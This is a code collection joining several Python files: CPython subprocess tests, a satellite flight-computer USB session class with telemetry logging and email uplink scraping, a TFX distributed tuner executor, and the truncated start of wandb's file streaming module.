remain a zombie. # spawn a Popen, and delete its reference before it exits p = subprocess.Popen([sys.executable, "-c", 'import sys, time;' 'time.sleep(0.2)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) def test_leak_fast_process_del_killed(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, and the process got killed by a signal, it would never # be removed from subprocess._active, which triggered a FD and memory # leak. # spawn a Popen, delete its reference and kill it p = subprocess.Popen([sys.executable, "-c", 'import time;' 'time.sleep(3)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p os.kill(pid, signal.SIGKILL) # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) # let some time for the process to exit, and create a new Popen: this # should trigger the wait() of p time.sleep(0.2) with self.assertRaises(EnvironmentError) as c: with subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: pass # p should have been wait()ed on, and removed from the _active list self.assertRaises(OSError, os.waitpid, pid, 0) self.assertNotIn(ident, [id(o) for o in subprocess._active]) def test_pipe_cloexec(self): # Issue 12786: check that the communication pipes' FDs are set CLOEXEC, # and are not inherited by another child process. p1 = subprocess.Popen([sys.executable, "-c", 'import os;' 'os.read(0, 1)' ], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) p2 = subprocess.Popen([sys.executable, "-c", """if True: import os, errno, sys for fd in %r: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise else: sys.exit(1) sys.exit(0) """ % [f.fileno() for f in (p1.stdin, p1.stdout, p1.stderr)] ], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) p1.communicate('foo') _, stderr = p2.communicate() self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr)) @unittest.skipUnless(mswindows, "Windows specific tests") class Win32ProcessTestCase(BaseTestCase): def test_startupinfo(self): # startupinfo argument # We uses hardcoded constants, because we do not want to # depend on win32all. STARTF_USESHOWWINDOW = 1 SW_MAXIMIZE = 3 startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = STARTF_USESHOWWINDOW startupinfo.wShowWindow = SW_MAXIMIZE # Since Python is a console process, it won't be affected # by wShowWindow, but the argument should be silently # ignored subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"], startupinfo=startupinfo) def test_creationflags(self): # creationflags argument CREATE_NEW_CONSOLE = 16 sys.stderr.write(" a DOS box should flash briefly ...\n") subprocess.call(sys.executable + ' -c "import time; time.sleep(0.25)"', creationflags=CREATE_NEW_CONSOLE) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], preexec_fn=lambda: 1) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], stdout=subprocess.PIPE, close_fds=True) def test_close_fds(self): # close file descriptors rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"], close_fds=True) self.assertEqual(rc, 47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "physalis" p = subprocess.Popen(["set"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertIn("physalis", p.stdout.read()) def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "physalis" p = subprocess.Popen("set", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertIn("physalis", p.stdout.read()) def test_call_string(self): # call() function with string argument on Windows rc = subprocess.call(sys.executable + ' -c "import sys; sys.exit(47)"') self.assertEqual(rc, 47) def _kill_process(self, method, *args): # Some win32 buildbot raises EOFError if stdin is inherited p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) _, stderr = p.communicate() self.assertStderrEqual(stderr, '') returncode = p.wait() self.assertNotEqual(returncode, 0) def _kill_dead_process(self, method, *args): p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() sys.exit(42) """], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') rc = p.wait() self.assertEqual(rc, 42) def test_send_signal(self): self._kill_process('send_signal', signal.SIGTERM) def test_kill(self): self._kill_process('kill') def test_terminate(self): self._kill_process('terminate') def test_send_signal_dead(self): self._kill_dead_process('send_signal', signal.SIGTERM) def test_kill_dead(self): self._kill_dead_process('kill') def test_terminate_dead(self): self._kill_dead_process('terminate') @unittest.skipUnless(getattr(subprocess, '_has_poll', False), "poll system call not supported") class ProcessTestCaseNoPoll(ProcessTestCase): def setUp(self): subprocess._has_poll = False ProcessTestCase.setUp(self) def tearDown(self): subprocess._has_poll = True ProcessTestCase.tearDown(self) class HelperFunctionTests(unittest.TestCase): @unittest.skipIf(mswindows, "errno and EINTR make no sense on windows") def test_eintr_retry_call(self): record_calls = [] def fake_os_func(*args): record_calls.append(args) if len(record_calls) == 2: raise OSError(errno.EINTR, "fake interrupted system call") return tuple(reversed(args)) self.assertEqual((999, 256), subprocess._eintr_retry_call(fake_os_func, 256, 999)) self.assertEqual([(256, 999)], record_calls) # This time there will be an EINTR so it will loop once. self.assertEqual((666,), subprocess._eintr_retry_call(fake_os_func, 666)) self.assertEqual([(256, 999), (666,), (666,)], record_calls) @unittest.skipUnless(mswindows, "mswindows only") class CommandsWithSpaces (BaseTestCase): def setUp(self): super(CommandsWithSpaces, self).setUp() f, fname = tempfile.mkstemp(".py", "te st") self.fname = fname.lower () os.write(f, b"import sys;" b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))" ) os.close(f) def tearDown(self): os.remove(self.fname) super(CommandsWithSpaces, self).tearDown() def with_spaces(self, *args, **kwargs): kwargs['stdout'] = subprocess.PIPE p = subprocess.Popen(*args, **kwargs) self.addCleanup(p.stdout.close) self.assertEqual( p.stdout.read ().decode("mbcs"), "2 [%r, 'ab cd']" % self.fname ) def test_shell_string_with_spaces(self): # call() function with string argument with spaces on Windows self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname, "ab cd"), shell=1) def test_shell_sequence_with_spaces(self): # call() function with sequence argument with spaces on Windows self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1) def test_noshell_string_with_spaces(self): # call() function with string argument with spaces on Windows self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname, "ab cd")) def test_noshell_sequence_with_spaces(self): # call() function with sequence argument with spaces on Windows self.with_spaces([sys.executable, self.fname, "ab cd"]) def test_main(): unit_tests = (ProcessTestCase, POSIXProcessTestCase, Win32ProcessTestCase, ProcessTestCaseNoPoll, HelperFunctionTests, CommandsWithSpaces) test_support.run_unittest(*unit_tests) test_support.reap_children() if __name__ == "__main__": test_main()
usb_session.py
import datetime import serial import threading import json import traceback import queue import os import pty import subprocess import glob from elasticsearch import Elasticsearch import email import imaplib from .data_consumers import Datastore, Logger from . import get_pio_asset from .cases.utils import str_to_val import lin class USBSession(object): ''' Represents a connection session with a Flight Computer's state system. This class is used by the simulation software and user command prompt to read and write to a flight computer's state. This object is thread-safe; if an instance of this class is shared between the MATLAB simulation interface (an instance of Simulation) and the user command line (an instance of StateCmdPrompt), they won't trip over each other in setting/receiving variables from the connected flight computer. ''' class Request(object): """Helper object allows read-state request to USB session to be easily synchronized. """ def __init__(self, field: str): super(USBSession.Request, self).__init__() self.__field = field self.__lock = threading.Lock() self.__has_reply = threading.Condition(self.__lock) self.__data = None @property def data(self) -> dict: with self.__lock: while self.__data is None: self.__has_reply.wait() return self.__data @data.setter def data(self, data: dict): with self.__lock: assert self.__data is None, "Error; the request has already been filled" assert data is not None, "Error; a request must be filled with a value other than None" self.__data = data self.__has_reply.notify_all() @property def field(self) -> str: return self.__field def __init__(self, device_name, uplink_console, port, is_teensy, simulation_run_dir, tlm_config, radio_imei, scrape_uplinks, enable_auto_dbtelem): ''' Initializes state session with a device. ''' # Device connection self.device_name = device_name self.port = port self.is_teensy = is_teensy self.radio_imei = radio_imei # Uplink console self.uplink_console = uplink_console # Data logging self.datastore = Datastore(device_name, simulation_run_dir) self.logger = Logger(device_name, simulation_run_dir) self.raw_logger = Logger(device_name + "_raw", simulation_run_dir) self.telem_save_dir = simulation_run_dir downlink_parser_filepath = get_pio_asset("gsw_downlink_parser") master_fd, slave_fd = pty.openpty() self.downlink_parser = subprocess.Popen([downlink_parser_filepath], stdin=master_fd, stdout=master_fd) self.dp_console = serial.Serial(os.ttyname(slave_fd), 9600, timeout=1) self.telem_save_dir = simulation_run_dir self.uplink_json_name = "uplink"+self.radio_imei+".http" self.uplink_sbd_name = "uplink"+self.radio_imei+".sbd" # Open a connection to elasticsearch self.es = Elasticsearch([{'host':"127.0.0.1",'port':"9200"}]) #connect to email self.scrape = scrape_uplinks self.username=tlm_config["email_username"] self.password=tlm_config["email_password"] self.mail = None self.enable_auto_dbtelem = enable_auto_dbtelem if self.username != "": self.mail = imaplib.IMAP4_SSL("imap.gmail.com", 993) self.mail.login(self.username, self.password) self.mail.select('"[Gmail]/Sent Mail"') self.debug_to_console = None def case_interaction_setup(self, _debug_to_console): self.debug_to_console = _debug_to_console def connect(self, console_port, baud_rate): ''' Starts serial connection to the desired device. Args: - console_port: Serial port to connect to. - baud_rate: Baud rate of connection. ''' try: self.console = serial.Serial(console_port, baud_rate) self.start_time = datetime.datetime.now() # This is t = 0 on the Teensy, +/- a few milliseconds. # Prevent multiple writes to the device at one time self.device_lock = threading.Lock() # Prevent multiple requests from being pushed to the queue at the same time self.request_lock = threading.Lock() self.requests = queue.Queue() self.datastore.start() self.logger.start() self.raw_logger.start() self.running_logger = True self.check_msgs_thread = threading.Thread( name=f"{self.device_name} logger thread", target=self.check_console_msgs) self.check_msgs_thread.start() self.scrape_uplinks_thread = threading.Thread( name=f"{self.device_name} uplinks", target=self.scrape_uplinks) self.scrape_uplinks_thread.start() print(f"Opened connection to {self.device_name}.") except serial.SerialException: print(f"Unable to open serial port for {self.device_name}.") return False return True def check_console_msgs(self): ''' Read device output for debug messages and state variable updates. Record debug messages to the logging file, and update the console's record of the state. ''' while self.running_logger: try: # Read line coming from device and parse it if self.console.inWaiting() > 0: line = self.console.readline().rstrip() self.raw_logger.put("Received: " + line.decode("utf-8")) else: continue data = json.loads(line) data['time'] = str(self.start_time + datetime.timedelta(milliseconds=data['t'])) if 'msg' in data: # The logline represents a debugging message created by Flight Software. Report the message to the logger. logline = f"[{data['time']}] ({data['svrty']}) {data['msg']}" self.logger.put(logline, add_time = False) # If we want debug to go to the console if self.debug_to_console: print(logline) elif 'telem' in data: logline = f"[{data['time']}] Received requested telemetry from spacecraft.\n" logline += data['telem'] # print("\n" + logline) self.logger.put(logline, add_time = False) #log data to a timestamped file telem_bytes = data['telem'].split(r'\x') telem_bytes.remove("") telem_file = open(os.path.join(self.telem_save_dir ,f"telem{self.radio_imei}[{data['time']}].txt"), "wb") for byte in telem_bytes: telem_file.write(int(byte, 16).to_bytes(1, byteorder='big')) telem_file.close() elif 'uplink' in data: if data['uplink'] and data['len']: logline = f"[{data['time']}] Successfully sent telemetry to FlightSoftware.\n" logline += str(data['uplink']) else: logline = f"[{data['time']}] Failed to send telemetry to FlightSoftware." print("\n" + logline) self.logger.put(logline, add_time = False) else: if 'err' in data: # The log line represents an error in retrieving or writing state data that # was caused by a USBSession client improperly setting/retrieving a value. # Report this failure to the logger. logline = f"[{data['time']}] (ERROR) Tried to {data['mode']} state value named \"{data['field']}\" but encountered an error: {data['err']}" self.logger.put(logline, add_time = False) data['val'] = None else: # A valid telemetry field was returned. Manage it. self.datastore.put(data) request = self.requests.get(block=False).data = data except ValueError: logline = f'[RAW] {line}' self.logger.put(logline) except serial.SerialException: print('Error: unable to read serial port for {}. Exiting.'. format(self.device_name)) self.disconnect() except: traceback.print_exc() print('Unspecified error. Exiting.') self.disconnect() def read_state(self, field, timeout = None): ''' Read state. Read the value of the state field associated with the given field name on the flight controller. ''' if not self.running_logger: return json_cmd = { 'mode': ord('r'), 'field': str(field) } json_cmd = json.dumps(json_cmd) + "\n" request = USBSession.Request(field) with self.request_lock: self.requests.put(request, block=False) with self.device_lock: self.console.write(json_cmd.encode()) self.raw_logger.put("Sent: " + json_cmd.rstrip()) return request.data['val'] def smart_read(self, field, **kwargs): ''' Turns a string state field read into the actual desired vals. Returns list of vals, or the val itself. Vals can be bools, ints, or floats. Raises NameError if no state field was found. ''' ret = self.read_state(field, kwargs.get('timeout')) if ret is None: raise NameError(f"State field: {field} not found.") # begin type inference return str_to_val(ret) def _write_state_basic(self, fields, vals, timeout = None): ''' Write multiple state fields to the device at once. ''' if not self.running_logger: return assert len(fields) == len(vals) assert len(fields) <= 20, "Flight Software can't handle more than 20 state field writes at a time" json_cmds = "" for field, val in zip(fields, vals): json_cmd = { 'mode': ord('w'), 'field': str(field), 'val': self._val_to_str(val) } json_cmd = json.dumps(json_cmd) + "\n" json_cmds += json_cmd if len(json_cmds) >= 512: print("Error: Flight Software can't handle input buffers >= 512 bytes.") return False requests = [USBSession.Request(field) for field in fields] with self.request_lock: for request in requests: self.requests.put(request, block=False) with self.device_lock: self.console.write(json_cmds.encode()) self.raw_logger.put("Sent: " + json_cmds) returned_vals = [request.data['val'] for request in requests] if returned_vals[0] is None: return False returned_vals = returned_vals[0].split(",") returned_vals = [x for x in returned_vals if x != ""] if (returned_vals[0].replace('.','').replace('-','')).isnumeric(): numeric_returned_vals = [float(x) for x in returned_vals] if type(vals[0]) == str: vals = vals[0] vals = [float(x) for x in vals.split(",") if x != ''] return numeric_returned_vals == vals return returned_vals == vals def write_multiple_states(self, fields, vals, timeout=None): ''' Write multiple states and check the write operation with feedback. Overwrite the value of the state field with the given state field name on the flight computer, and then verify that the state was actually set. ''' # Filter out fields that are being overridden by the user field_val_pairs = [ field_val_pair for field_val_pair in zip(fields, vals) ] fields, vals = zip(*field_val_pairs) return self._write_state_basic(list(fields), list(vals), timeout) def _val_to_str(self, val): ''' Convert a state value or list of values into a single string writable to a state. Currently, the supported types are integers, doubles, integer vectors, double vectors, and booleans. ''' if(type(val) in {lin.Vector2, lin.Vector3, lin.Vector4}): val = list(val) if type(val) not in (list, tuple): if type(val) is bool: return 'true' if val else 'false' else: return str(val) else: val_str = '' for _val in val: val_str += self._val_to_str(_val) + ', ' return val_str[:len(val_str) - 2] def write_state(self, field, *args, **kwargs): ''' Write state and check write operation with feedback. Overwrite the value of the state field with the given state field name on the flight computer, and then verify that the state was actually set. ''' return self.write_multiple_states([field], [self._val_to_str(args)], kwargs.get('timeout')) def send_uplink(self, filename): ''' Gets the uplink packet from the given file. Sends the hex representation of the packet and the length of the packet to the console to be processed by FlightSoftware ''' # Get the uplink packet from the uplink sbd file try: file = open(filename, "rb") except: logline = f"Error: File {filename} doesn't exist" self.raw_logger.put(logline) return False uplink_packet = file.read() uplink_packet_length = len(uplink_packet) file.close() uplink_packet = str(''.join(r'\x'+hex(byte)[2:] for byte in uplink_packet)) #get the hex representation of the packet bytes # Send a command to the console to process the uplink packet json_cmd = { 'mode': ord('u'), 'val': uplink_packet, 'length': uplink_packet_length } json_cmd = json.dumps(json_cmd) + "\n" with self.device_lock: self.console.write(json_cmd.encode()) self.raw_logger.put("Sent: " + json_cmd) return True def uplink(self, fields, vals, timeout=None): ''' Create an uplink packet from the provided data and save it locally to disk. The send_uplink function can be used to send this uplink to the flight controller. Returns: false if the uplink could not be created, true otherwise. The uplink might not be possible to create if it uses unrecognized state fields or if its size exceeds 70 bytes. ''' if not self.running_logger: return # Filter out fields that are being overridden by the user field_val_pairs = [ field_val_pair for field_val_pair in zip(fields, vals) ] fields, vals = zip(*field_val_pairs) success = self.uplink_console.create_uplink(fields, vals, self.uplink_sbd_name, self.uplink_json_name) # If the uplink packet exists, send it to the FlightSoftware console if success and os.path.exists(self.uplink_sbd_name): success &= self.send_uplink(self.uplink_sbd_name) os.remove(self.uplink_sbd_name) os.remove(self.uplink_json_name) return success else: if os.path.exists(self.uplink_json_name): os.remove(self.uplink_json_name) return False def parsetelem(self): ''' Provide the latest downlink telemetry file that was received from the spacecraft to the downlink producer, and then return the parsed value of the latest completed downlink frame as a JSON object. ''' #get newest file telem_files = glob.iglob(os.path.join(self.telem_save_dir, f'telem{self.radio_imei}*')) try: newest_telem_file = max(telem_files, key=os.path.basename) except ValueError: return "No telemetry to parse." self.dp_console.write((newest_telem_file+"\n").encode()) line = self.dp_console.readline().rstrip() if line == b'': # TODO A MORE FORMAL FIX print("[ WARNING ] USB_SESSION LINE FIX") line = b'null' telem_json_data = json.loads(line) if telem_json_data is not None: try: data = telem_json_data['data'] ### Attempt to extract metadata if it exists try: metadata = telem_json_data['metadata'] print(metadata) except: pass return data except: print("Error parsing telemetry data") # print("Printing meta data" + str(telem_json_data['metadata'])) return None def dbtelem(self): ''' Run parsetelem(), and dump the results into the Elasticsearch database. This function is useful because it allows database-connected technologies, such as the telemetry webserver and OpenMCT, to consume downlink data. ''' jsonObj = self.parsetelem() if not isinstance(jsonObj, dict): # print(f"Error parsing telemetry on {self.device_name}") return False failed = False for field in jsonObj: value = jsonObj[field] data=json.dumps({ field: value, "time.downlink_received": str(datetime.datetime.utcnow().isoformat())[:-3]+'Z' }) res = self.es.index(index='statefield_report_'+str(self.radio_imei), doc_type='report', body=data) if not res['result'] == 'created': failed = True return not failed def scrape_uplinks(self): ''' For the AMC tests, we need the Flight Computer to read sent uplinks without actually using Iridium. This method reads from the "sent" box in the PAN email account (attempted uplinks) and passes the uplink packet directly to the Flight computer. ''' while self.scrape == True and self.mail != None: self.scrape_uplink() def scrape_uplink(self): ''' Look in the Sent Mail box of the Pan email account and forward all the uplinks directed to this satellite to the Flight Computer ''' #look for all new emails from iridium try: self.mail.select('"[Gmail]/Sent Mail"') except: self.mail = imaplib.IMAP4_SSL("imap.gmail.com", 993) self.mail.login(self.username, self.password) self.mail.select('"[Gmail]/Sent Mail"') _, data = self.mail.search(None, '(FROM "pan.ssds.qlocate@gmail.com")', '(UNSEEN)') mail_ids = data[0] id_list = mail_ids.split() for num in id_list: #.fetch() fetches the mail for given id where 'RFC822' is an Internet # Message Access Protocol. _, data = self.mail.fetch(num,'(RFC822)') #go through each component of data for response_part in data: if isinstance(response_part, tuple): # converts message from byte literal to string removing b'' msg = email.message_from_bytes(response_part[1]) email_subject = msg['subject'] if email_subject.isdigit(): # Get imei number of the radio that the uplink was sent to radio_imei = int(email_subject) if self.radio_imei != None and radio_imei == int(self.radio_imei): # Go through the email contents for part in msg.walk(): if part.get_content_maintype() == 'multipart': continue if part.get('Content-Disposition') is None: continue # Check if there is an email attachment if part.get_filename() is not None: # Download uplink packet from email attachment and send it to the Flight Computer fp = open("new_" + self.uplink_sbd_name, 'wb') fp.write(part.get_payload(decode=True)) fp.close() self.send_uplink("new_"+self.uplink_sbd_name) os.remove("new_"+self.uplink_sbd_name) else: # Mark message as unseen again if it wasn't addressed to this satellite self.mail.store(num, '-FLAGS', '\SEEN') return True def disconnect(self): '''Quits the program and stores message log and field telemetry to file.''' print(f' - Terminating console connection to and saving logging/telemetry data for {self.device_name}.') # End threads self.running_logger = False self.check_msgs_thread.join() self.scrape = False self.scrape_uplinks_thread.join() self.console.close() self.dp_console.close() self.datastore.stop() self.logger.stop() self.raw_logger.stop() print(f' - Finished terminating for {self.device_name}.')
executor.py
# Lint as: python3 # Copyright 2020 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Helper class to start TFX Tuner as a Job on Google Cloud AI Platform.""" import datetime import json import multiprocessing import os from typing import Any, Dict, List, Text from absl import logging from tfx import types from tfx.components.tuner import executor as tuner_executor from tfx.dsl.components.base import base_executor from tfx.extensions.google_cloud_ai_platform import runner from tfx.extensions.google_cloud_ai_platform.trainer import executor as ai_platform_trainer_executor from tfx.types import standard_component_specs from tfx.utils import json_utils # Directory to store intermediate hyperparamter search progress. # TODO(b/160188053): Use the same temp dir as the calling Executor. TUNING_ARGS_KEY = 'ai_platform_tuning_args' _WORKING_DIRECTORY = '/tmp' class Executor(base_executor.BaseExecutor): """Tuner executor that launches parallel tuning flock on Cloud AI Platform. This executor starts a Cloud AI Platform (CAIP) Training job with a flock of workers, where each worker independently executes Tuner's search loop on the single machine. Per KerasTuner's design, distributed Tuner's identity is controlled by the environment variable (KERASTUNER_TUNER_ID) to each workers in the CAIP training job. Those environment variables are configured in each worker of CAIP training job's worker flock. In addition, some implementation of KerasTuner requires a separate process to centrally manage the state of tuning (called as 'chief oracle') which is consulted by all workers according as another set of environment variables (KERASTUNER_ORACLE_IP and KERASTUNER_ORACLE_PORT). In summary, distributed tuning flock by Cloud AI Platform Job is structured as follows. Executor.Do() -> launch _Executor.Do() on a possibly multi-worker CAIP job -> -+> master -> _search() (-> create a subprocess -> run the chief oracle.) | +> trigger a single tuner.search() +> worker -> _search() -> trigger a single tuner.search() +> worker -> _search() -> trigger a single tuner.search() """ # TODO(b/160013376): Refactor common parts with Trainer Executor. def Do(self, input_dict: Dict[Text, List[types.Artifact]], output_dict: Dict[Text, List[types.Artifact]], exec_properties: Dict[Text, Any]) -> None: """Starts a Tuner component as a job on Google Cloud AI Platform.""" self._log_startup(input_dict, output_dict, exec_properties) custom_config = json_utils.loads( exec_properties.get(standard_component_specs.CUSTOM_CONFIG_KEY, 'null')) if custom_config is None: raise ValueError('custom_config is not provided') if not isinstance(custom_config, Dict): raise TypeError('custom_config in execution properties must be a dict, ' 'but received %s' % type(custom_config)) training_inputs = custom_config.get(TUNING_ARGS_KEY) if training_inputs is None: err_msg = ('\'%s\' not found in custom_config.' % TUNING_ARGS_KEY) logging.error(err_msg) raise ValueError(err_msg) training_inputs = training_inputs.copy() tune_args = tuner_executor.get_tune_args(exec_properties) num_parallel_trials = (1 if not tune_args else tune_args.num_parallel_trials) if num_parallel_trials > 1: # Chief node is also responsible for conducting tuning loop. desired_worker_count = num_parallel_trials - 1 if training_inputs.get('workerCount') != desired_worker_count: logging.warning('workerCount is overridden with %s', desired_worker_count) training_inputs['workerCount'] = desired_worker_count training_inputs['scaleTier'] = 'CUSTOM' training_inputs['masterType'] = ( training_inputs.get('masterType') or 'standard') training_inputs['workerType'] = ( training_inputs.get('workerType') or 'standard') # 'tfx_tuner_YYYYmmddHHMMSS' is the default job ID if not specified. job_id = ( custom_config.get(ai_platform_trainer_executor.JOB_ID_KEY) or 'tfx_tuner_{}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S'))) # TODO(b/160059039): Factor out label creation to a utility function. executor_class = _WorkerExecutor executor_class_path = '%s.%s' % (executor_class.__module__, executor_class.__name__) # Note: exec_properties['custom_config'] here is a dict. return runner.start_aip_training(input_dict, output_dict, exec_properties, executor_class_path, training_inputs, job_id) def _need_chief_oracle(exec_properties: Dict[Text, Any]) -> bool: """Returns True if the Tuner instance requires a chief oracle.""" # TODO(b/160902662): Skip chief oracle for CloudTuner that does not require # chief oracle for distributed tuning (it is a no-op, # because it simply forwards to the AI Platform Optimizer # service). del exec_properties return True class _WorkerExecutor(base_executor.BaseExecutor): """TFX Tuner executor impl as a worker in a Google Cloud AI Platform job.""" def _start_chief_oracle_in_subprocess( self, input_dict: Dict[Text, List[types.Artifact]], exec_properties: Dict[Text, List[types.Artifact]]): """Starts a chief oracle in a subprocess.""" def _run_chief_oracle() -> None: """Invoke chief oracle, and listen to the open port.""" logging.info('chief_oracle() starting...') # Per KerasTuner's specification, configuration of chief oracle is set # by environment variables. This only affects the current sub-process # which is single-threaded, but not the main process. As such, mutation # of this otherwise global state is safe. os.environ['KERASTUNER_ORACLE_IP'] = '0.0.0.0' os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port os.environ['KERASTUNER_TUNER_ID'] = 'chief' logging.info('Binding chief oracle server at: %s:%s', os.environ['KERASTUNER_ORACLE_IP'], os.environ['KERASTUNER_ORACLE_PORT']) # By design of KerasTuner, chief oracle blocks forever. Ref. # https://github.com/keras-team/keras-tuner/blob/e8b0ad3ecae471c73e17cb41f37e6f99202ac0dd/kerastuner/engine/base_tuner.py#L74-L76 tuner_executor.search(input_dict, exec_properties, _WORKING_DIRECTORY) # Because of KerasTuner's interface whereby behavior is controlled # by environment variables, starting the chief oracle in a sub-process, # as opposed to another thread in the main process, in order not to leak # the environment variables. result = multiprocessing.Process(target=_run_chief_oracle) result.start() logging.info('Chief oracle started at PID: %s', result.pid) return result def _search(self, input_dict: Dict[Text, List[types.Artifact]], exec_properties: Dict[Text, List[types.Artifact]]): """Conducts a single search loop, setting up chief oracle if necessary.""" # If not distributed, simply conduct search and return. if self._tuner_id is None: return tuner_executor.search(input_dict, exec_properties, _WORKING_DIRECTORY) if _need_chief_oracle(exec_properties): # If distributed search, and this node is chief, start a chief oracle # process before conducting search by itself. if self._is_chief: # Tuner with chief oracle will block forever. As such, start it in # a subprocess and manage its lifecycle by the main process. # Note that the Tuner with chief oracle does not run search loop, # hence does not run TensorFlow code in the subprocess. self._chief_process = self._start_chief_oracle_in_subprocess( input_dict, exec_properties) # If distributed, both master and worker need to know where the oracle is. # Per KerasTuner's interface, it is configured through env variables. # This only affects the current main process, which is designed to be # single-threaded. As such, mutation of this otherwise global state is # safe. os.environ['KERASTUNER_ORACLE_IP'] = self._master_addr os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port logging.info('Oracle chief is known to be at: %s:%s', os.environ['KERASTUNER_ORACLE_IP'], os.environ['KERASTUNER_ORACLE_PORT']) # Conduct tuner search loop, regardless of master or worker. # There is only one Tuner instance in the current process, as such, # controllling the id of the Tuner instance via environment variable # is safe. os.environ['KERASTUNER_TUNER_ID'] = self._tuner_id logging.info('Setting KERASTUNER_TUNER_ID with %s', os.environ['KERASTUNER_TUNER_ID']) return tuner_executor.search(input_dict, exec_properties, _WORKING_DIRECTORY) def __init__(self, context): super(_WorkerExecutor, self).__init__(context) # Those fields are populated only when running in distribution. self._is_chief = False self._tuner_id = None self._master_addr = None self._master_port = None self._chief_process = None # Populated when the chief oracle is started. # Initialize configuration of distribution according to CLUSTER_SPEC logging.info('Initializing cluster spec... ') cluster_spec = json.loads(os.environ.get('CLUSTER_SPEC', '{}')) # If CLUSTER_SPEC is not present, assume single-machine tuning. if not cluster_spec: return self._master_addr, self._master_port = ( # We rely on Cloud AI Platform Training service's specification whereby # there will be no more than one master replica. # https://cloud.google.com/ai-platform/training/docs/distributed-training-containers#cluster-spec-format cluster_spec['cluster']['master'][0].split(':')) self._tuner_id = ( 'tfx-tuner-%s-%d' % ( cluster_spec['task']['type'], # 'master' or 'worker' cluster_spec['task']['index'] # zero-based index )) logging.info('Tuner ID is: %s', self._tuner_id) self._is_chief = cluster_spec['task']['type'] == 'master' logging.info('Cluster spec initalized with: %s', cluster_spec) def __del__(self): self._close() def _close(self) -> None: """Kills the chief oracle sub-process, if still running.""" if self._chief_process and self._chief_process.is_alive(): logging.info('Terminating chief oracle at PID: %s', self._chief_process.pid) self._chief_process.terminate() def Do(self, input_dict: Dict[Text, List[types.Artifact]], output_dict: Dict[Text, List[types.Artifact]], exec_properties: Dict[Text, Any]) -> None: tuner = self._search(input_dict, exec_properties) if self._tuner_id is not None and not self._is_chief: logging.info('Returning since this is not chief worker.') return tuner_executor.write_best_hyperparameters(tuner, output_dict) self._close()
file_stream.py
import base64 import binascii import collections import itertools import logging import os import sys import random import requests import threading import time from dataclasses import dataclass from typing import TYPE_CHECKING, Any, Dict, Iterator, List, Tuple import wandb from wandb import util from wandb import env import six from six.moves import queue from ..lib import file_stream_utils logger = logging.getLogger(__name__) Chunk = collections.namedtuple("Chunk", ("filename", "data")) if TYPE_CHECKING: from typing import Any, List, Dict class DefaultFilePolicy(object): def __init__(self, start_chunk_id=0): self._chunk_id = start_chunk_id def process_chunks(self, chunks): chunk_id = self._chunk_id self._chunk_id += len(chunks) return {"offset": chunk_id, "content": [c.data for c in chunks]} class JsonlFilePolicy(DefaultFilePolicy): def process_chunks(self, chunks): chunk_id = self._chunk_id # TODO: chunk_id is getting reset on each request... self._chunk_id += len(chunks) chunk_data = [] for chunk in chunks: if len(chunk.data) > util.MAX_LINE_BYTES: msg = "Metric data exceeds maximum size of {} ({})".format( util.to_human_size(util.MAX_LINE_BYTES), util.to_human_size(len(chunk.data)), ) wandb.termerror(msg, repeat=False) util.sentry_message(msg) else: chunk_data.append(chunk.data) return { "offset": chunk_id, "content": chunk_data, } class SummaryFilePolicy(DefaultFilePolicy): def process_chunks(self, chunks): data = chunks[-1].data if len(data) > util.MAX_LINE_BYTES: msg = 